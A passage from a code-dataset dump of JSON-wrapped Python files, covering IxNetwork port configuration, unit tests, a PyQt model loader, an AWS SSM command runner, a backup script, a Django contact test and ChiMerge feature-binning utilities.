proposed_import.pop(key)\n if len(proposed_import) > 0:\n imports.append(proposed_import)\n\n def _set_gigabit_auto_negotiation(self, vport, layer1, imports):\n advertise = []\n advertise.append(\n Vport._SPEED_MAP[layer1.get(\"speed\", with_default=True)]\n )\n auto_field_name = \"enableAutoNegotiation\"\n if re.search(\"novustengiglan\", vport[\"type\"].lower()) is not None:\n auto_field_name = \"autoNegotiate\"\n # Due to ieeeL1Defaults dependency\n ieee_l1_defaults = layer1.get(\"ieee_media_defaults\", with_default=True)\n if ieee_l1_defaults is None:\n ieee_l1_defaults = \"True\"\n ieee_media_defaults = {\n \"xpath\": vport[\"xpath\"]\n + \"/l1Config/\"\n + vport[\"type\"].replace(\"Fcoe\", \"\"),\n \"ieeeL1Defaults\": ieee_l1_defaults,\n }\n self._add_l1config_import(vport, ieee_media_defaults, imports)\n auto_negotiation = layer1.get(\"auto_negotiation\", with_default=True)\n rs_fec = auto_negotiation.get(\"rs_fec\", with_default=True)\n link_training = auto_negotiation.get(\n \"link_training\", with_default=True\n )\n auto_negotiate = layer1.get(\"auto_negotiate\", with_default=True)\n if auto_negotiate is None:\n auto_negotiate = \"True\"\n proposed_import = {\n \"xpath\": vport[\"xpath\"]\n + \"/l1Config/\"\n + vport[\"type\"].replace(\"Fcoe\", \"\"),\n \"speed\": Vport._SPEED_MAP[layer1.speed],\n \"{0}\".format(auto_field_name): False\n if auto_negotiate is None\n else auto_negotiate,\n \"enableRsFec\": False if rs_fec is None else rs_fec,\n \"linkTraining\": False if link_training is None else link_training,\n \"speedAuto\": advertise,\n }\n proposed_import[\"media\"] = layer1.get(\"media\", with_default=True)\n self._add_l1config_import(vport, proposed_import, imports)\n\n def _get_speed(self, vport, layer1):\n if vport[\"type\"] == \"ethernetvm\":\n return Vport._VM_SPEED_MAP[layer1.speed]\n else:\n return Vport._SPEED_MAP[layer1.speed]\n\n def _reset_auto_negotiation(self, vport, layer1, imports):\n if (\n layer1.speed.endswith(\"_mbps\") is False\n and layer1.speed != \"speed_1_gbps\"\n ):\n imports.append(\n {\n \"xpath\": vport[\"xpath\"]\n + \"/l1Config/\"\n + vport[\"type\"].replace(\"Fcoe\", \"\"),\n \"enableAutoNegotiation\": layer1.get(\n \"auto_negotiate\", with_default=True\n ),\n }\n )\n\n def _set_fcoe(self, vport, layer1, imports):\n flow_control = layer1.get(\"flow_control\")\n if flow_control is None:\n return\n directed_address = flow_control.get(\n \"directed_address\", with_default=True\n )\n directed_address = \"\".join(directed_address.split(\":\"))\n l1_xpath = \"%s/l1Config/%s\" % (\n vport[\"xpath\"],\n vport[\"type\"].replace(\"Fcoe\", \"\"),\n )\n imports.append(\n {\"xpath\": l1_xpath, \"flowControlDirectedAddress\": directed_address}\n )\n xpath = \"%s/l1Config/%s/fcoe\" % (\n vport[\"xpath\"],\n vport[\"type\"].replace(\"Fcoe\", \"\"),\n )\n fcoe = {\n \"xpath\": xpath,\n \"flowControlType\": Vport._FLOW_CONTROL_MAP[flow_control.choice],\n }\n if flow_control.choice == \"ieee_802_1qbb\":\n pfc = flow_control.get(\"ieee_802_1qbb\", with_default=True)\n pfc_delay = pfc.get(\"pfc_delay\", with_default=True)\n fcoe[\"enablePFCPauseDelay\"] = False if pfc_delay == 0 else True\n fcoe[\"pfcPauseDelay\"] = pfc_delay\n fcoe[\"pfcPriorityGroups\"] = [\n -1 if pfc.pfc_class_0 is None else pfc.pfc_class_0,\n -1 if pfc.pfc_class_1 is None else pfc.pfc_class_1,\n -1 if pfc.pfc_class_2 is None else pfc.pfc_class_2,\n -1 if pfc.pfc_class_3 is None else pfc.pfc_class_3,\n -1 if pfc.pfc_class_4 is None else pfc.pfc_class_4,\n -1 if pfc.pfc_class_5 is None else pfc.pfc_class_5,\n -1 if pfc.pfc_class_6 is None else pfc.pfc_class_6,\n -1 if pfc.pfc_class_7 is None else pfc.pfc_class_7,\n ]\n fcoe[\"priorityGroupSize\"] = \"priorityGroupSize-8\"\n fcoe[\"supportDataCenterMode\"] = True\n imports.append(fcoe)\n\n def _clear_ownership(self, locations):\n try:\n force_ownership = (\n self._api.snappi_config.options.port_options.location_preemption\n )\n except Exception:\n force_ownership = False\n self.logger.debug(\"location_preemption is %s\" % force_ownership)\n if force_ownership is True:\n self.logger.debug(\"We are clearing ownership\")\n available_hardware_hrefs = {}\n location_hrefs = {}\n for location in locations:\n if \";\" in location:\n clp = location.split(\";\")\n chassis = (\n self._api._ixnetwork.AvailableHardware.Chassis.find(\n Hostname=clp[0]\n )\n )\n if len(chassis) > 0:\n available_hardware_hrefs[\n location\n ] = \"%s/card/%s/port/%s\" % (\n chassis.href,\n abs(int(clp[1])),\n abs(int(clp[2])),\n )\n elif \"/\" in location:\n appliance = location.split(\"/\")[0]\n locations = self._api._ixnetwork.Locations\n locations.find(Hostname=appliance)\n if len(locations) == 0:\n locations.add(Hostname=appliance)\n ports = locations.Ports.find(Location=\"^%s$\" % location)\n if len(ports) > 0:\n location_hrefs[location] = ports.href\n self._api.clear_ownership(available_hardware_hrefs, location_hrefs)\n\n def _set_result_value(\n self, row, column_name, column_value, column_type=str\n ):\n if (\n len(self._column_names) > 0\n and column_name not in self._column_names\n ):\n return\n try:\n row[column_name] = column_type(column_value)\n except Exception:\n if column_type.__name__ in [\"float\", \"int\"]:\n row[column_name] = 0\n else:\n row[column_type] = column_value\n\n def results(self, request):\n \"\"\"Return port results\"\"\"\n\n self._column_names = request.get(\"column_names\")\n if self._column_names is None:\n self._column_names = []\n elif not isinstance(self._column_names, list):\n msg = \"Invalid format of port_names passed {},\\\n expected list\".format(\n self._column_names\n )\n raise Exception(msg)\n\n port_names = request.get(\"port_names\")\n if port_names is None or len(port_names) == 0:\n port_names = [port.name for port in self._api._config.ports]\n elif not isinstance(port_names, list):\n msg = \"Invalid format of port_names passed {},\\\n expected list\".format(\n port_names\n )\n raise Exception(msg)\n\n self.logger.debug(\"Extracting %s stats for these ports %s\" % (\n self._column_names, port_names\n ))\n port_filter = {\"property\": \"name\", \"regex\": \".*\"}\n port_filter[\"regex\"] = \"^(%s)$\" % \"|\".join(\n self._api.special_char(port_names)\n )\n\n port_rows = dict()\n vports = self._api.select_vports(port_name_filters=[port_filter])\n for vport in vports.values():\n port_row = dict()\n self._set_result_value(port_row, \"name\", vport.get(\"name\"))\n location = vport.get(\"location\")\n if (\n vport.get(\"connectionState\").startswith(\"connectedLink\")\n is True\n ):\n location += \";connected\"\n elif len(location) > 0:\n location += \";\" + vport.get(\"connectionState\")\n else:\n location = vport.get(\"connectionState\")\n self._set_result_value(port_row, \"location\", location)\n self._set_result_value(\n port_row,\n \"link\",\n \"up\"\n if vport[\"connectionState\"] == \"connectedLinkUp\"\n else \"down\",\n )\n self._set_result_value(port_row, \"capture\", \"stopped\")\n # init all columns with corresponding zero-values so that\n # the underlying dictionary contains all requested columns\n # in an event of unwanted exceptions\n for ext_name, _, typ in self._RESULT_COLUMNS:\n self._set_result_value(port_row, ext_name, 0, typ)\n\n port_rows[vport[\"name\"]] = port_row\n\n try:\n table = self._api.assistant.StatViewAssistant(\"Port Statistics\")\n except Exception:\n self._api.warning(\"Could not retrive the port statistics viewer\")\n return list(port_rows.values())\n\n self.logger.debug(\"These are port results:\")\n for row in table.Rows:\n vport_name = row[\"Port Name\"]\n if vport_name is None:\n raise Exception(\"Could not retrive 'Port Name' from stats\")\n port_row = port_rows.get(vport_name)\n self.logger.debug(str(port_row))\n if port_row is None:\n continue\n for ext_name, int_name, typ in self._RESULT_COLUMNS:\n try:\n row_val = row[int_name]\n self._set_result_value(port_row, ext_name, row_val, typ)\n except Exception:\n # TODO print a warning maybe ?\n pass\n return list(port_rows.values())\n","sub_path":"snappi_ixnetwork/vport.py","file_name":"vport.py","file_ext":"py","file_size_in_byte":32346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"317539783","text":"import unittest\nimport sys\n\nfrom os import path\nsys.path.append(path.dirname(path.dirname(path.abspath(__file__))))\n\nfrom src.resources.users import UsersIdsCars\n\npath = \"/api/v1/users/\"\n\nclass TestCase(unittest.TestCase):\n\n def test_get_action(self):\n service = UsersIdsCars()\n expected = \"GET request on \" + path + \"1/cars\"\n assert service.get(1) == expected\n\n def test_post_action(self):\n service = UsersIdsCars()\n expected = \"POST request on \" + path + \"1/cars\"\n assert service.post(1) == expected\n \nif __name__ == '__main__':\n unittest.main()\n","sub_path":"src/test/test_users_ids_cars.py","file_name":"test_users_ids_cars.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"449658201","text":"from PyQt5 import QtWidgets\nimport pickle\n\nfrom point_spectra_gui.ui.RestoreRegressionModel import Ui_loadData\nfrom point_spectra_gui.util.Modules import Modules\n\n\nclass RestoreRegressionModel(Ui_loadData, Modules):\n \"\"\"\n Restores a previously pickled Regression Model into the UI.\n The data needs to be a .pickle file in order for this widget to work\n \"\"\"\n\n def setupUi(self, Form):\n super().setupUi(Form)\n Modules.setupUi(self, Form)\n\n def get_widget(self):\n return self.groupBox\n\n def connectWidgets(self):\n self.newFilePushButton.clicked.connect(lambda: self.getDataButton_clicked(self.fileNameLineEdit))\n\n def getDataButton_clicked(self, lineEdit):\n starting_path = self.outpath + \"/saved_models\"\n\n filename, _filter = QtWidgets.QFileDialog.getOpenFileName(None, \"Select Regression Model File\", starting_path, \"(*.pickle)\")\n lineEdit.setText(filename)\n if lineEdit.text() == \"\":\n lineEdit.setText(\"*.pickle\")\n\n def run(self, filename = None, keyname = None):\n if filename == None:\n filename = self.fileNameLineEdit.text()\n print('Loading Regression Model From: ' + str(filename))\n\n pickle_file = open(filename, \"rb\")\n\n regression_model = pickle.load(pickle_file)\n restored_modelkey = regression_model.modelkey\n\n pickle_file.close()\n\n self.models[restored_modelkey] = regression_model\n self.modelkeys.append(restored_modelkey)\n\n\nif __name__ == \"__main__\":\n import sys\n\n app = QtWidgets.QApplication(sys.argv)\n\n Form = QtWidgets.QWidget()\n ui = RestoreRegressionModel()\n ui.setupUi(Form)\n Form.show()\n sys.exit(app.exec_())\n","sub_path":"point_spectra_gui/core/RestoreRegressionModel.py","file_name":"RestoreRegressionModel.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"435219162","text":"#!/usr/bin/env python\nimport boto3\nimport time\nimport sys\nfrom logging import getLogger, StreamHandler, DEBUG, Formatter\nfrom datetime import datetime\n\nargs = sys.argv\ncommand = \"cat /etc/hosts\"\ninstance_id = args[1]\nssm = boto3.client('ssm')\n\n##Command投入\n\nr = ssm.send_command(\n InstanceIds = [instance_id],\n DocumentName = \"AWS-RunShellScript\",\n Parameters = {\n \"commands\": [\n command\n ] \n }\n )\ncommand_id = r['Command']['CommandId']\n\n## 処理終了待ち\ntime.sleep(5)\n\nres = ssm.list_command_invocations(\n CommandId = command_id,\n Details = True\n )\ninvocations = res['CommandInvocations']\nstatus = invocations[0]['Status']\n\nif status == \"Failed\":\n print(\"Command実行エラー\")\n\n## 結果格納\n\naccount = invocations[0]['CommandPlugins'][0]['Output']\nprint(account)","sub_path":"src/aws_run_command.py","file_name":"aws_run_command.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"238364470","text":"import Connections\nfrom Quick_Python import run_query\n\n\ndef info_skills():\n query = \"select Name from Info_Skills Where Job = 'True' ORDER BY Name\"\n cursor = run_query(query)\n rows = cursor.fetchall()\n skills = []\n for row in rows:\n skills.append(row.Name)\n return skills\n\n\ndef info_classes():\n query = \"select Class from Info_Classes ORDER BY Class \"\n cursor = run_query(query)\n rows = cursor.fetchall()\n classes = []\n for row in rows:\n classes.append(row.Class)\n return classes\n","sub_path":"cogs/Utility_Menu/SQL_Lookup.py","file_name":"SQL_Lookup.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"196829915","text":"#-------------------------------------------------------------------------------\n# Name: pybak.py\n# Purpose: Create a backup of files contained in one or more directories.\n#\n# Author: Jeremy Morris\n#\n# Created: 14/03/2015\n# Copyright: (c) Jeremy 2015\n# License: MIT\n#-------------------------------------------------------------------------------\n\nimport datetime\nimport os\nimport shutil\nimport errno\nimport yaml\n\ndef parse_config():\n #This path will need to be edited depening on how you run this script.\n with open('config\\data.yaml') as f:\n return yaml.load(f)\n \ndef get_backup_directory(target_dir, name):\n date = datetime.datetime.now().strftime('%Y-%m-%d_%H%M')\n return target_dir.format(name, date)\n\ndef copy_files_to(task): #EDIT this to include ignore_patterns.\n try:\n shutil.copytree(task['source'], task['target'])\n except OSError as e:\n if e.errno == errno.ENOTDIR:\n shutil.copy(task['source'], task['target'])\n else:\n print('Directory not copied. Error: %s' % e)\n\ndef perform_backup(task):\n task['target'] = get_backup_directory(task['base_backup_dir'], task['name'])\n copy_files_to(task)\n\ndef job_runner(task):\n current_job = {'base_backup_dir' : task['base_backup_dir']}\n for job in task['jobs']:\n current_job['name'] = job[0]\n current_job['source'] = job[1]\n perform_backup(current_job)\n\ndef main():\n job_runner(parse_config())\n \n\nif __name__ == '__main__':\n main()","sub_path":"pybak/pybak.py","file_name":"pybak.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"228380306","text":"from django.core import mail\nfrom django.test.utils import override_settings\nfrom django.urls import reverse\nfrom rest_framework.test import APITestCase\nfrom rest_framework import status\nfrom data.factories import CanteenFactory\n\n\nclass TestCanteenContact(APITestCase):\n @override_settings(DEFAULT_FROM_EMAIL=\"contact@example.com\")\n def test_contact_canteen(self):\n \"\"\"\n An email should be sent to the managing team when the contact endpoint is called\n \"\"\"\n canteen = CanteenFactory.create()\n payload = {\n \"canteenId\": canteen.id,\n \"from\": \"test@example.com\",\n \"name\": \"Camille Dupont\",\n \"message\": \"Test message \",\n }\n response = self.client.post(reverse(\"contact_canteen\"), payload)\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(mail.outbox), 1)\n email = mail.outbox[0]\n # sent to all managers and our team\n self.assertEqual(len(email.to), canteen.managers.all().count() + 1)\n self.assertEqual(email.from_email, \"contact@example.com\")\n self.assertIn(\"Camille Dupont\", email.body)\n self.assertIn(\"Test message \", email.body)\n self.assertIn(\"contact@example.com\", email.body)\n self.assertEqual(len(email.reply_to), 1)\n self.assertEqual(email.reply_to[0], \"test@example.com\")\n\n @override_settings(DEFAULT_FROM_EMAIL=\"contact@example.com\")\n def test_anonymous_contact(self):\n \"\"\"\n If a name isn't given, gracefully handle email text\n \"\"\"\n canteen = CanteenFactory.create()\n payload = {\n \"canteenId\": canteen.id,\n \"from\": \"test@example.com\",\n \"name\": \"\",\n \"message\": \"Test\",\n }\n self.client.post(reverse(\"contact_canteen\"), payload)\n\n self.assertIn(\"Une personne\", mail.outbox[0].body)\n","sub_path":"api/tests/test_contact_canteen.py","file_name":"test_contact_canteen.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"190621502","text":"import os\n\nfrom django.core.management.base import BaseCommand, CommandError\nfrom wand.image import Image\n\nfrom openpyxl import Workbook\n\nclass Command(BaseCommand):\n # args = ''\n help = 'Converts data to spreadsheet'\n\n def handle(self, filename, *args, **options):\n try:\n data = [['one', 'two', 'three', 'four'], [1, 2, 3, 4]]\n wb = Workbook()\n ws = wb.active\n for row in data:\n ws.append(row)\n wb.save('example.xlsx')\n except Exception as e:\n raise CommandError(e.message)\n","sub_path":"src/components/convert_to_spreadsheet.py","file_name":"convert_to_spreadsheet.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"443328684","text":"# coding=utf-8\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom scipy import stats\r\nimport math\r\nfrom sklearn.utils.multiclass import type_of_target\r\nimport varclus_analysis\r\nimport csv\r\nimport decision_tree_binning as dt\r\n#import model_helper\r\nfrom sklearn.model_selection import train_test_split\r\nfrom tqdm import tqdm\r\nimport matplotlib.pyplot as plt\r\nfrom functools import partial\r\nimport statsmodels.api as sm\r\nimport model_helper_y as helper\r\nfrom sklearn.cross_validation import train_test_split\r\nfrom multiprocessing import Process,Pool,Queue\r\nimport multiprocessing\r\n\r\ndef variableFilter(inputData,unique_threshold=100):\r\n nominal_vars = getNominalVars(inputData)\r\n cols2drop = []\r\n for col in nominal_vars:\r\n counts = len(inputData[col].unique())\r\n if counts > unique_threshold or counts == 1:\r\n cols2drop.append(col)\r\n \r\n numerical_vars = [col for col in inputData.columns if col not in nominal_vars]\r\n for col in numerical_vars:\r\n counts = len(inputData[col].unique())\r\n if counts == 1:\r\n cols2drop.append(col)\r\n \r\n return cols2drop\r\n\r\ndef getNominalVars(inputData):\r\n nominal_flag = inputData.dtypes == 'object'\r\n nominal_vars = inputData.columns[nominal_flag].values.tolist()\r\n \r\n return nominal_vars\r\n\r\ndef readFile(path):\r\n '''\r\n Read raw data from an user defined file\r\n @Params: String \r\n @Return: Pandas DataFrame\r\n '''\r\n dataset = None\r\n if type(path) == str and 'csv' in path:\r\n dataset = pd.read_csv(path)\r\n elif type(path) == str and 'pkl' in path:\r\n dataset = pd.read_pickle(path)\r\n elif type(path) == str and 'xlsx' in path:\r\n dataset = pd.read_excel(path)\r\n else:\r\n raise TypeError(\"Input data should be in following types: csv,pkl,xlsx.\")\r\n \r\n return dataset\r\n\r\ndef split(content,i):\r\n '''\r\n Split the attributes, collect the data of the ith attribute, i = 0,1,2,3...\r\n Return a dataframe with selected attribute and the target\r\n \r\n notes: the target variable should be the last column\r\n @Params: Pandas DataFrame \r\n @Return: Pandas DataFrame \r\n '''\r\n content = content.iloc[:,[i,-1]]\r\n \r\n return content\r\n\r\ndef count(data_set):\r\n '''\r\n Count the number of exactly same records\r\n \r\n @Params: Pandas DataFrame\r\n @Return: Pandas DataFrame\r\n '''\r\n columns = data_set.columns.values.tolist()\r\n data_set['count'] = 1\r\n counted_data = data_set.groupby(columns,as_index=False)['count'].sum()\r\n \r\n return counted_data\r\n\r\ndef build(counted_data):\r\n '''\r\n Build a structure that ChiMerge algorithm works properly on it \r\n Return a dictionary\r\n @Params: tuple\r\n @Return: list of tuples like [(Bug,[69,0]),(Dragon,[20,12])]\r\n '''\r\n target_values = counted_data.iloc[:,-2].value_counts().index.tolist()\r\n n = len(target_values)\r\n length_dic = {}\r\n for record in counted_data.values.tolist():\r\n flag = 0\r\n if record[0] not in length_dic.keys():\r\n length_dic[record[0]] = [0] * n\r\n for i in range(n):\r\n if record[1] == target_values[i]:\r\n length_dic[record[0]][i] = record[2]\r\n flag += 1\r\n if flag == 0:\r\n raise TypeError(\"Data Exception\")\r\n length_dic = sorted(length_dic.items())\r\n \r\n return length_dic\r\n\r\ndef Initialize(content,i):\r\n dataset = split(content,i)\r\n counted_data = count(dataset)\r\n length_dic = build(counted_data)\r\n \r\n return length_dic\r\n\r\ndef chi2(intervals):\r\n '''\r\n Compute the Chi-Square value\r\n @Params: List\r\n Numerical intervals and corresponding Y targets \r\n in a form like [[2,15],\r\n [11,0]]\r\n @Return: Integer \r\n chi2 statistic-test result\r\n '''\r\n m=len(intervals) \r\n num_class=len(intervals[0]) \r\n #sum of each row\r\n Rows=[] \r\n for i in range(m): \r\n sum=0 \r\n for j in range(num_class): \r\n sum+=intervals[i][j] \r\n Rows.append(sum) \r\n #sum of each column\r\n Cols=[] \r\n for j in range(num_class): \r\n sum=0 \r\n for i in range(m): \r\n sum+=intervals[i][j] \r\n Cols.append(sum) \r\n #total number in the intervals\r\n N=0 \r\n for i in Cols: \r\n N += i \r\n \r\n chi_value=0 \r\n for i in range(m): \r\n for j in range(num_class): \r\n Estimate=Rows[i]*Cols[j]/N \r\n if Estimate!=0: \r\n chi_value=chi_value+(intervals[i][j]-Estimate)**2/Estimate \r\n return chi_value \r\n\r\ndef ChiMerge(length_dic,max_interval,df = 1): \r\n ''' ChiMerge algorithm \r\n Return split points for Numerical attributes\r\n @Params: List of tuples stand for each unique interval and its Y result\r\n Integer\r\n Integer\r\n @Return: List\r\n '''\r\n num_interval=len(length_dic)\r\n ceil = max(record[0] for record in length_dic) \r\n print(ceil) \r\n if max_interval is not None:\r\n while(num_interval>max_interval): \r\n num_pair=num_interval-1 \r\n chi_values=[]\r\n #calculate the chi value of each neighbor interval \r\n for i in range(num_pair): \r\n intervals=[length_dic[i][1],length_dic[i+1][1]] \r\n chi_values.append(chi2(intervals)) \r\n # get the minimum chi value \r\n min_chi=min(chi_values)\r\n for i in range(num_pair-1,-1,-1): # treat from the last one, because I change the bigger interval as 'Merged' \r\n if chi_values[i]==min_chi:\r\n # combine the two adjacent intervals\r\n temp = length_dic[i][:]\r\n for j in range(len(length_dic[i+1])):\r\n temp[1][j] += length_dic[i+1][1][j]\r\n \r\n length_dic[i]=temp \r\n length_dic[i+1]='Merged'\r\n while('Merged' in length_dic): # remove the merged record \r\n length_dic.remove('Merged') \r\n num_interval=len(length_dic)\r\n \r\n split_points = []\r\n for record in length_dic:\r\n split_points.append(record[0])\r\n \r\n print('split_point = {lst} \\nfinal intervals'.format(lst = split_points))\r\n split_points.append(ceil)\r\n \r\n for i in range(len(split_points)-1):\r\n print(str(split_points[i]) + '~' + str(split_points[i+1]))\r\n\r\n return(split_points) \r\n\r\ndef ChiMerge_cfl(length_dic,confidence_level,df = 1): \r\n ''' ChiMerge algorithm \r\n Return split points for Numerical attributes applying confidence level standard\r\n instead of assigning max intervals\r\n @Params: List of tuples stand for each unique interval and its Y result\r\n Float\r\n Integer\r\n @Return: List '''\r\n chi_threshold = {0.9:2.7,\r\n 0.95:3.84,\r\n 0.99:6.635}\r\n num_interval=len(length_dic)\r\n #print(length_dic)\r\n ceil = max(record[0] for record in length_dic) \r\n print(ceil) \r\n #TODO\r\n if confidence_level is not None:\r\n threshold = chi_threshold.get(confidence_level)\r\n while(True):\r\n num_pair=num_interval-1 \r\n chi_values=[]\r\n #calculate the chi value of each neighbor interval \r\n for i in range(num_pair): \r\n intervals=[length_dic[i][1],length_dic[i+1][1]]\r\n chi_values.append(chi2(intervals)) \r\n # get the minimum chi value \r\n #TODO BUG\r\n #print(chi_values)\r\n min_chi=min(chi_values)\r\n # if the minimum chi value is bigger than threshold then stop\r\n if min_chi > threshold or len(chi_values) == 1:\r\n break\r\n for i in range(num_pair-1,-1,-1): # treat from the last one, because I change the bigger interval as 'Merged' \r\n if chi_values[i]==min_chi:\r\n # combine the two adjacent intervals\r\n temp = length_dic[i][:]\r\n for j in range(len(length_dic[i+1])):\r\n temp[1][j] += length_dic[i+1][1][j]\r\n \r\n length_dic[i]=temp \r\n length_dic[i+1]='Merged'\r\n while('Merged' in length_dic): # remove the merged record \r\n length_dic.remove('Merged') \r\n num_interval=len(length_dic)\r\n \r\n split_points = []\r\n for record in length_dic:\r\n split_points.append(record[0])\r\n \r\n print('split_point = {lst} \\nfinal intervals'.format(lst = split_points))\r\n split_points.append(ceil)\r\n \r\n for i in range(len(split_points)-1):\r\n print(str(split_points[i]) + '~' + str(split_points[i+1]))\r\n\r\n return(split_points) \r\n\r\n'''\r\n@deprecated\r\ndef detectNaN(length_dic):\r\n \r\n length_dic_bf = len(length_dic)\r\n nan_flag = False\r\n length_dic = [record for record in length_dic if record[0] != 'NaN']\r\n length_dic_af = len(length_dic)\r\n if length_dic_bf != length_dic_af:\r\n nan_flag = True\r\n \r\n return length_dic,nan_flag\r\n'''\r\n\r\ndef cal_nominal_intervals(col,inputData,target):\r\n #lock.acquire()\r\n nominal_intervals = {}\r\n print('\\n'+col)\r\n dataset = inputData.loc[:,[col,target]].values.tolist()\r\n nominal_split = dt.chooseBestValueToSplit(dataset)\r\n nominal_intervals[col] = nominal_split\r\n #lock.release()\r\n\r\n return nominal_intervals\r\n\r\ndef cal_intervals(index,inputData,target,other_var_lst,max_interval):\r\n #lock.acquire()\r\n intervals = {}\r\n print('\\n'+other_var_lst[index]) \r\n dataset = split(inputData[other_var_lst+[target]],index)\r\n counted_data = count(dataset)\r\n length_dic = build(counted_data)\r\n split_points = ChiMerge(length_dic,max_interval)\r\n intervals[other_var_lst[index]] = split_points\r\n #lock.release()\r\n\r\n return intervals\r\n\r\ndef discrete(inputData,nominal_var_lst,max_interval=6,multiprocess = False): \r\n '''Discrete the given dataset\r\n @Params: DataFrameList includes variable names for nominal columns\r\n Integer\r\n @Return: \r\n Dictionary numerical intervals\r\n Dictionary nominal intervals\r\n lock.release()'''\r\n #m = multiprocessing.Manager()\r\n #lock = m.Lock()\r\n if multiprocess != False:\r\n attribute_list = inputData.iloc[:,:-1].columns.values.tolist()\r\n other_var_lst = [var for var in attribute_list if var not in nominal_var_lst]\r\n target = inputData.columns.values[-1]\r\n cpu_cnts = multiprocessing.cpu_count()\r\n pool = multiprocessing.Pool(cpu_cnts)\r\n multiple_results1 = [pool.apply_async(cal_nominal_intervals,(col,inputData,target)) for col in nominal_var_lst]\r\n multiple_results2 = [pool.apply_async(cal_intervals,(index,inputData,target,other_var_lst,max_interval)) for index in range(len(other_var_lst))]\r\n pool.close()\r\n pool.join()\r\n\r\n nominal_intervals = {}\r\n for res in multiple_results1:\r\n nominal_intervals.update(res.get())\r\n\r\n intervals = {}\r\n for res in multiple_results2:\r\n intervals.update(res.get())\r\n\r\n return intervals,nominal_intervals,inputData\r\n \r\n else:\r\n attribute_list = inputData.iloc[:,:-1].columns.values.tolist()\r\n #print(attribute_list)\r\n other_var_lst = [var for var in attribute_list if var not in nominal_var_lst]\r\n #print(other_var_lst)\r\n target = inputData.columns.values[-1]\r\n \r\n #iterate nominal variables\r\n nominal_intervals = {}\r\n for i in range(len(nominal_var_lst)):\r\n print('\\n'+nominal_var_lst[i])\r\n dataset = inputData.loc[:,[nominal_var_lst[i],target]].values.tolist()\r\n #print(dataset)\r\n nominal_split = dt.chooseBestValueToSplit(dataset)\r\n nominal_intervals[nominal_var_lst[i]] = nominal_split \r\n\r\n #iterate ordinal and numerical variables\r\n intervals = {}\r\n for i in range(len(other_var_lst)):\r\n print('\\n'+other_var_lst[i])\r\n #length_dic,pokemon = Initialize(pokemon,i)\r\n \r\n dataset = split(inputData[other_var_lst+[target]],i)\r\n counted_data = count(dataset)\r\n length_dic = build(counted_data)\r\n \r\n split_points = ChiMerge(length_dic,max_interval)\r\n intervals[other_var_lst[i]] = split_points\r\n\r\n return intervals,nominal_intervals,inputData\r\n\r\ndef cal_intervals_cfl(index,inputData,target,other_var_lst,confidence_level):\r\n #lock.acquire()\r\n intervals = {}\r\n print('\\n'+other_var_lst[index]) \r\n dataset = split(inputData[other_var_lst+[target]],index)\r\n counted_data = count(dataset)\r\n length_dic = build(counted_data)\r\n split_points = ChiMerge_cfl(length_dic,confidence_level)\r\n intervals[other_var_lst[index]] = split_points\r\n #lock.release()\r\n\r\n return intervals\r\n\r\ndef discrete_cfl(inputData,nominal_var_lst,confidence_level=0.95,EPS=1e-7,multiprocess = False): \r\n '''Discrete the given dataset by applying confidence level\r\n @Params: DataFrame\r\n List includes variable names for nominal columns\r\n Integer\r\n @Return: \r\n Dictionary numerical intervals\r\n Dictionary nominal intervals\r\n ''' \r\n if multiprocess != False:\r\n attribute_list = inputData.iloc[:,:-1].columns.values.tolist()\r\n other_var_lst = [var for var in attribute_list if var not in nominal_var_lst]\r\n target = inputData.columns.values[-1]\r\n cpu_cnts = multiprocessing.cpu_count()\r\n pool = multiprocessing.Pool(cpu_cnts)\r\n multiple_results1 = [pool.apply_async(cal_nominal_intervals,(col,inputData,target)) for col in nominal_var_lst]\r\n multiple_results2 = [pool.apply_async(cal_intervals_cfl\r\n ,(index,inputData,target,other_var_lst,confidence_level)) for index in range(len(other_var_lst))]\r\n pool.close()\r\n pool.join()\r\n\r\n nominal_intervals = {}\r\n for res in multiple_results1:\r\n nominal_intervals.update(res.get())\r\n\r\n intervals = {}\r\n for res in multiple_results2:\r\n intervals.update(res.get())\r\n\r\n return intervals,nominal_intervals,inputData\r\n \r\n else:\r\n attribute_list = inputData.iloc[:,:-1].columns.values.tolist()\r\n #print(attribute_list)\r\n other_var_lst = [var for var in attribute_list if var not in nominal_var_lst]\r\n #print(other_var_lst)\r\n target = inputData.columns.values[-1]\r\n \r\n #iterate nominal variables\r\n nominal_intervals = {}\r\n for i in range(len(nominal_var_lst)):\r\n print('\\n'+nominal_var_lst[i])\r\n dataset = inputData.loc[:,[nominal_var_lst[i],target]].values.tolist()\r\n #print(dataset)\r\n nominal_split = dt.chooseBestValueToSplit(dataset)\r\n nominal_intervals[nominal_var_lst[i]] = nominal_split \r\n\r\n #iterate ordinal and numerical variables\r\n intervals = {}\r\n for i in range(len(other_var_lst)):\r\n print('\\n'+other_var_lst[i])\r\n #length_dic,pokemon = Initialize(pokemon,i)\r\n \r\n dataset = split(inputData[other_var_lst+[target]],i)\r\n counted_data = count(dataset)\r\n length_dic = build(counted_data)\r\n \r\n split_points = ChiMerge_cfl(length_dic,confidence_level)\r\n intervals[other_var_lst[i]] = split_points\r\n\r\n return intervals,nominal_intervals,inputData\r\n\r\ndef nominal_trans(col,inputData,nominal_intervals):\r\n #rst_s = pd.Series()\r\n if col.strip() != \"\":\r\n rst_s = pd.Series(inputData[col].apply(nominal_bin_convar,values=nominal_intervals[col]).values.tolist())\r\n #rst_s = rst_s.reset_index(drop=True)\r\n rst_s.name = col + '_bin'\r\n #print('---------nominal')\r\n 